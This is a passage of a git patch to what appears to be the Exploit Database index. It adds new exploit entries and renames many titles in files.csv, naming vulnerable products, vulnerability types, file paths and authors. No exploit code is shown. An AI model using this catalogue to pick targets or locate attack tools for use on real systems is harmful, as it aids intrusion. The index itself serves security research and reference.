From 9f1fdff37d141ee8a65e0d22297c6341c357eb62 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 30 Dec 2016 05:01:19 +0000 Subject: [PATCH] DB: 2016-12-30 6 new exploits VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC) VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC) SilverSHielD 1.0.2.34 - (opendir) Denial of Service SilverSHielD 1.0.2.34 - Denial of Service Android - get_user/put_user Exploit (Metasploit) LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion LoudBlog 0.4 - Arbitrary Remote File Inclusion MyEvent 1.3 - (myevent_path) Remote File Inclusion MyEvent 1.3 - 'event.php' Remote File Inclusion LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion PHP Easy Downloader 1.5 - (save.php) Remote Code Execution PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution Ip Reg 0.3 - Multiple SQL Injections IP Reg 0.3 - Multiple SQL Injections AstroSPACES - 'id' SQL Injection AstroSPACES 1.1.1 - 'id' Parameter SQL Injection myEvent 1.6 - (viewevent.php) SQL Injection myEvent 1.6 - 'eventdate' Parameter SQL Injection Mosaic Commerce - 'category.php cid' SQL Injection Mosaic Commerce - 'cid' Parameter SQL Injection PokerMax Poker League - Insecure Cookie Handling Kure 0.6.3 - (index.php post & doc) Local File Inclusion PokerMax Poker League 0.13 - Insecure Cookie Handling Kure 0.6.3 - 'index.php' Local File Inclusion PHP Easy Downloader 1.5 - (file) File Disclosure PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion XOOPS Module GesGaleri - (kategorino) SQL Injection XOOPS Module GesGaleri - SQL Injection zeeproperty - 'adid' SQL Injection zeeproperty - 'adid' Parameter SQL Injection Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion yappa-ng 2.3.3-beta0 - (album) Local File Inclusion Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection Joomla! Component ds-syndicate - (feed_id) SQL Injection XOOPS Module makale - SQL Injection WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection XOOPS Module makale 0.26 - SQL Injection ShopMaker 1.0 - (product.php id) SQL Injection Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection ShopMaker CMS 1.0 - 'id' Parameter SQL Injection Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection phpcrs 2.06 - (importFunction) Local File Inclusion LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion LoudBlog 0.8.0a - 'ajax.php' SQL Injection YDC - 'kdlist.php cat' SQL Injection YDC - 'cat' Parameter SQL Injection txtshop 1.0b (Windows) - 'Language' Local File Inclusion txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection MindDezign Photo Gallery 2.2 - SQL Injection websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution Aj RSS Reader - 'EditUrl.php url' SQL Injection Aj RSS Reader - 'url' Parameter SQL Injection WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection SFS Ez Forum - 'forum.php id' SQL Injection WordPress Plugin Media Holder - SQL Injection SFS Ez Forum - SQL Injection e107 Plugin EasyShop - (category_id) Blind SQL Injection e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection CafeEngine - 'index.php catid' SQL Injection CafeEngine - 'catid' Parameter SQL Injection shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion CafeEngine CMS 2.3 - SQL Injection CafeEngine 2.3 - SQL Injection Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting LoudBlog 0.41 - podcast.php id Parameter SQL Injection LoudBlog 0.41 - 'podcast.php' SQL Injection LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion myEvent 1.2/1.3 - Myevent.php Remote File Inclusion myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting yappa-ng - 'index.php' album Parameter Cross-Site Scripting yappa-ng - Query String Cross-Site Scripting Yappa-ng - 'index.php' album Parameter Cross-Site Scripting Yappa-ng - Query String Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing tinybrowser - 'type' Parameter Cross-Site Scripting tinybrowser - 'tinybrowser.php' Directory Listing tinybrowser - 'edit.php' Directory Listing Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection PHPMailer < 5.2.18 - Remote Code Execution (Python) WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery --- files.csv | 120 ++++++++++++++------------- platforms/android/local/40975.rb | 81 ++++++++++++++++++ platforms/hardware/webapps/40977.txt | 112 +++++++++++++++++++++++++ platforms/hardware/webapps/40978.txt | 63 ++++++++++++++ platforms/php/webapps/38180.txt | 7 -- platforms/php/webapps/38181.txt | 7 -- platforms/php/webapps/40973.txt | 24 ++++++ platforms/php/webapps/40974.py | 65 +++++++++++++++ platforms/php/webapps/40976.txt | 24 ++++++ 9 files changed, 431 insertions(+), 72 deletions(-) create mode 100755 platforms/android/local/40975.rb create mode 100755 platforms/hardware/webapps/40977.txt create mode 100755 platforms/hardware/webapps/40978.txt delete mode 100755 platforms/php/webapps/38180.txt delete mode 100755 platforms/php/webapps/38181.txt create mode 100755 platforms/php/webapps/40973.txt create mode 100755 platforms/php/webapps/40974.py create mode 100755 platforms/php/webapps/40976.txt diff --git a/files.csv b/files.csv index 5c6607b0f..88bb43d40 100644 --- a/files.csv +++ b/files.csv @@ -503,7 +503,7 @@ id,file,description,date,author,platform,type,port 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0 -3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 +3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 @@ -838,7 +838,7 @@ id,file,description,date,author,platform,type,port 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0 -6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 +6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0 @@ -8440,6 +8440,7 @@ id,file,description,date,author,platform,type,port 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0 +40975,platforms/android/local/40975.rb,"Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0 @@ -16028,7 +16029,7 @@ id,file,description,date,author,platform,type,port 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 -1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0 +1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0 @@ -16147,7 +16148,7 @@ id,file,description,date,author,platform,type,port 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0 1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 -1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0 +1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps,0 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0 @@ -16381,7 +16382,7 @@ id,file,description,date,author,platform,type,port 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 -2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 +2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 @@ -16553,7 +16554,7 @@ id,file,description,date,author,platform,type,port 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 -2292,platforms/php/webapps/2292.txt,"yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 +2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - (aedating4CMS.php) Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 @@ -16964,7 +16965,7 @@ id,file,description,date,author,platform,type,port 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps,0 2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 -2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0 +2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Inclusion",2006-11-21,irvian,php,webapps,0 @@ -18172,7 +18173,7 @@ id,file,description,date,author,platform,type,port 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0 -4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0 +4771,platforms/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection",2007-12-23,DNX,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0 @@ -19682,65 +19683,65 @@ id,file,description,date,author,platform,type,port 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0 6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0 -6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 +6758,platforms/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' Parameter SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 -6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0 +6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' Parameter SQL Injection",2008-10-15,JosS,php,webapps,0 6762,platforms/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,php,webapps,0 -6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'category.php cid' SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 +6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'cid' Parameter SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,php,webapps,0 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps,0 -6766,platforms/php/webapps/6766.txt,"PokerMax Poker League - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 -6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0 +6766,platforms/php/webapps/6766.txt,"PokerMax Poker League 0.13 - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 +6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - 'index.php' Local File Inclusion",2008-10-16,JosS,php,webapps,0 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps,0 -6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0 +6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure",2008-10-16,LMaster,php,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps,0 -6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0 +6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion",2008-10-16,ZeN,php,webapps,0 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0 -6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - (kategorino) SQL Injection",2008-10-18,EcHoLL,php,webapps,0 +6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - SQL Injection",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 -6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0 +6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' Parameter SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0 -6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 -6788,platforms/php/webapps/6788.txt,"yappa-ng 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 +6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 +6788,platforms/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 -6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 -6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection",2008-10-19,girex,php,webapps,0 -6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0 -6795,platforms/php/webapps/6795.txt,"XOOPS Module makale - SQL Injection",2008-10-20,EcHoLL,php,webapps,0 +6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 +6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0 +6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection",2008-10-20,boom3rang,php,webapps,0 +6795,platforms/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps,0 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 -6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0 -6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0 +6799,platforms/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' Parameter SQL Injection",2008-10-21,"Hussin X",php,webapps,0 +6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 -6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 -6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0 +6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 +6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - 'ajax.php' SQL Injection",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 -6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 +6811,platforms/php/webapps/6811.txt,"YDC - 'cat' Parameter SQL Injection",2008-10-22,"Hussin X",php,webapps,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 -6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 +6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 -6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 +6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0 -6822,platforms/php/webapps/6822.txt,"websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0 +6822,platforms/php/webapps/6822.txt,"WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory 